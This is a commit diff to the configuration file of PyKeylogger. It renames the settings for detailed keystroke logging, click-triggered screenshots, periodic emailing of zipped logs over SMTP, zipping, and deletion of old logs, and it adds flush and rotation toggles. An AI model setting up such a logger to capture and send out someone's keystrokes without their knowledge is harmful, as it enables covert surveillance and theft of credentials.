fix a bunch of typo bugs, implement meat behind control panel actions add debug messages on spawning and starting timer threads standardize and logic-ize ini/val structure add some gpl notices

--- a/pykeylogger.ini
+++ b/pykeylogger.ini
@@ -41,8 +41,8 @@ _Usage Time Flag = eJxLyywqLiktTgUAD3wDdg==
 _Thread_Class = DetailedLogWriterFirstStage
 
 # default: True
-Enable Logger Tooltip = Enable this logger.
-Enable Logger = True
+Enable Detailed Log Writer Tooltip = Enable this logger.
+Enable Detailed Log Writer = True
 
 # default: detailedlog
 Log Subdirectory Tooltip = Use this subdirectory inside the main log directory for this logger.
@@ -87,8 +87,8 @@ Non-printing Character Representation = [KeyName:%keyname%]
 _Thread_Class = EmailLogSender
 
 # default: False
-SMTP Send Email Tooltip = Set to True to enable automatic periodic emails of a zipped archive of logfiles.
-SMTP Send Email = False
+Enable E-mail Tooltip = Set to True to enable automatic periodic emails of a zipped archive of logfiles.
+Enable E-mail = False
 
 # default: True
 SMTP Needs Login Tooltip = Set to True if your SMTP server requires a login with username/password.
@@ -117,24 +117,24 @@ SMTP Use TLS Tooltip = Set this to True to enable TLS encryption (a good idea if
 SMTP Use TLS = True
 
 # default: yourfromaddress@host.com
-SMTP From Tooltip = Set to the email address that you want to appear in the "From" line in your email.
-SMTP From = yourfromaddress@host.com
+E-mail From Tooltip = Set to the email address that you want to appear in the "From" line in your email.
+E-mail From = yourfromaddress@host.com
 
 # default: yourtoaddress@host.com
-SMTP To Tooltip = Set to the email address that you want to send email to. Separate multiple addresses semicolon ";".
-SMTP To = yourtoaddress@host.com
+E-mail To Tooltip = Set to the email address that you want to send email to. Separate multiple addresses semicolon ";".
+E-mail To = yourtoaddress@host.com
 
 # default: Automatic Logfile Email
-SMTP Subject Tooltip = Set to the text you want to appear in the Subject line in your email.
-SMTP Subject = Automatic Logfile Email
+E-mail Subject Tooltip = Set to the text you want to appear in the Subject line in your email.
+E-mail Subject = Automatic Logfile Email
 
 # default: "Please see attached zipfile."
-SMTP Message Body Tooltip = Set to the text that you want to appear in the message body of your email.
-SMTP Message Body = Please see attached zipfile.
+E-mail Message Body Tooltip = Set to the text that you want to appear in the message body of your email.
+E-mail Message Body = Please see attached zipfile.
 
 # default: 4.0
-Email Interval Tooltip = Specify the time interval between automatic log email events, in HOURS.
-Email Interval = 4.0
+E-mail Interval Tooltip = Specify the time interval between automatic log email events, in HOURS.
+E-mail Interval = 4.0
 
 [[Zip]]
 
@@ -142,8 +142,8 @@ Email Interval = 4.0
 _Thread_Class = LogZipper
 
 # default: False
-Zip Enable Tooltip = Set this to true to enable automatic zipping of logfiles to dated archives (and deletion of files that have been zipped).
-Zip Enable = False
+Enable Zip Tooltip = Set this to true to enable automatic zipping of logfiles to dated archives (and deletion of files that have been zipped).
+Enable Zip = False
 
 # default: 4.0
 Zip Interval Tooltip = Set this to the time interval between automatic zip events, in HOURS.
@@ -191,8 +191,8 @@ Zip Interval = 4.0
 _Thread_Class = OldLogDeleter
 
 # default: False
-Delete Old Logs Tooltip = Set to True to enable automatic deletion of old logs.
-Delete Old Logs = False
+Old Log Deletion Enable Tooltip = Set to True to enable automatic deletion of old logs.
+Old Log Deletion Enable = False
 
 # default: 2.0
 Max Log Age Tooltip = Set to the maximum age of the logs that you want to keep, in DAYS. Logs older than this will be deleted.
@@ -202,11 +202,14 @@ Max Log Age = 2.0
 Age Check Interval Tooltip = Set to the frequency of checking for and deleting logs older than maxLogAge, in HOURS.
 Age Check Interval = 2.0
 
-
 [[Log Flush]]
 
 # Name of class to instantiate to create this thread. Internal use only.
 _Thread_Class = LogFlusher
+
+# default: True
+Log Flush Enable Tooltip = Enable logfile buffer autoflush. Recommended, to reduce potential for data loss in case of crash.
+Log Flush Enable = True
 
 # default: 120
 Flush Interval Tooltip = Specify the time interval between buffer autoflush events, in SECONDS.
@@ -216,6 +219,10 @@ Flush Interval = 120.0
 
 # Name of class to instantiate to create this thread. Internal use only.
 _Thread_Class = LogRotator
+
+# default: True
+Log Rotation Enable Tooltip = Enable log rotation. Recommended, to avoid unbounded log file growth. Log file will be renamed to a dated filename, and a fresh one will be started, with each rotation event.
+Log Rotation Enable = True
 
 # default: 4.0
 Log Rotation Interval Tooltip = Specify the time interval between log rotation events, in HOURS.
@@ -229,8 +236,8 @@ Log Rotation Interval = 4.0
 _Thread_Class = OnClickImageCaptureFirstStage
 
 # default: True
-Capture Clicks Tooltip = Enable the capture of a partial screenshot at every mouse click. This functionality grabs an area around the mouse pointer with every click (size defined with the width and height settings in this panel). Images are stored in the 'images' subdirectory of the main Log Directory, in PNG format (other formats coming soon).
-Capture Clicks = True
+Enable Click Image Capture Tooltip = Enable the capture of a partial screenshot at every mouse click. This functionality grabs an area around the mouse pointer with every click (area size defined with the width and height settings in this panel). 
+Enable Click Image Capture = True
 
 # default: detailedlog
 Log Subdirectory Tooltip = Use this subdirectory inside the main log directory for this logger.
@@ -262,8 +269,8 @@ Capture Clicks Image Quality = 75
 _Thread_Class = EmailLogSender
 
 # default: False
-SMTP Send Email Tooltip = Set to True to enable automatic periodic emails of a zipped archive of logfiles.
-SMTP Send Email = False
+Enable E-mail Tooltip = Set to True to enable automatic periodic emails of a zipped archive of logfiles.
+Enable E-mail = False
 
 # default: True
 SMTP Needs Login Tooltip = Set to True if your SMTP server requires a login with username/password.
@@ -292,24 +299,24 @@ SMTP Use TLS Tooltip = Set this to True to enable TLS encryption (a good idea if
 SMTP Use TLS = True
 
 # default: yourfromaddress@host.com
-SMTP From Tooltip = Set to the email address that you want to appear in the "From" line in your email.
-SMTP From = yourfromaddress@host.com
+E-mail From Tooltip = Set to the email address that you want to appear in the "From" line in your email.
+E-mail From = yourfromaddress@host.com
 
 # default: yourtoaddress@host.com
-SMTP To Tooltip = Set to the email address that you want to send email to. Separate multiple addresses semicolon ";".
-SMTP To = yourtoaddress@host.com
+E-mail To Tooltip = Set to the email address that you want to send email to. Separate multiple addresses semicolon ";".
+E-mail To = yourtoaddress@host.com
 
 # default: Automatic Logfile Email
-SMTP Subject Tooltip = Set to the text you want to appear in the Subject line in your email.
-SMTP Subject = Automatic Logfile Email
+E-mail Subject Tooltip = Set to the text you want to appear in the Subject line in your email.
+E-mail Subject = Automatic Logfile Email
 
 # default: "Please see attached zipfile."
-SMTP Message Body Tooltip = Set to the text that you want to appear in the message body of your email.
-SMTP Message Body = Please see attached zipfile.
+E-mail Message Body Tooltip = Set to the text that you want to appear in the message body of your email.
+E-mail Message Body = Please see attached zipfile.
 
 # default: 4.0
-Email Interval Tooltip = Specify the time interval between automatic log email events, in HOURS.
-Email Interval = 4.0
+E-mail Interval Tooltip = Specify the time interval between automatic log email events, in HOURS.
+E-mail Interval = 4.0
 
 [[Zip]]
 
@@ -317,8 +324,8 @@ Email Interval = 4.0
 _Thread_Class = LogZipper
 
 # default: False
-Zip Enable Tooltip = Set this to true to enable automatic zipping of logfiles to dated archives (and deletion of files that have been zipped).
-Zip Enable = False
+Enable Zip Tooltip = Set this to true to enable automatic zipping of logfiles to dated archives (and deletion of files that have been zipped).
+Enable Zip = False
 
 # default: 4.0
 Zip Interval Tooltip = Set this to the time interval between automatic zip events, in HOURS.
@@ -330,8 +337,8 @@ Zip Interval = 4.0
 _Thread_Class = OldLogDeleter
 
 # default: False
-Delete Old Logs Tooltip = Set to True to enable automatic deletion of old logs.
-Delete Old Logs = False
+Old Log Deletion Enable Tooltip = Set to True to enable automatic deletion of old logs.
+Old Log Deletion Enable = False
 
 # default: 2.0
 Max Log Age Tooltip = Set to the maximum age of the logs that you want to keep, in DAYS. Logs older than this will be deleted.
@@ -347,6 +354,10 @@ Age Check Interval = 2.0
 # Name of class to instantiate to create this thread. Internal use only.
 _Thread_Class = LogFlusher
 
+# default: True
+Log Flush Enable Tooltip = Enable logfile buffer autoflush. Recommended, to reduce potential for data loss in case of crash.
+Log Flush Enable = True
+
 # default: 120
 Flush Interval Tooltip = Specify the time interval between buffer autoflush events, in SECONDS.
 Flush Interval = 120.0
@@ -355,6 +366,10 @@ Flush Interval = 120.0
 
 # Name of class to instantiate to create this thread. Internal use only.
 _Thread_Class = LogRotator
+
+# default: True
+Log Rotation Enable Tooltip = Enable log rotation. Recommended, to avoid unbounded log file growth. Log file will be renamed to a dated filename, and a fresh one will be started, with each rotation event.
+Log Rotation Enable = True
 
 # default: 4.0
 Log Rotation Interval Tooltip = Specify the time interval between log rotation events, in HOURS.
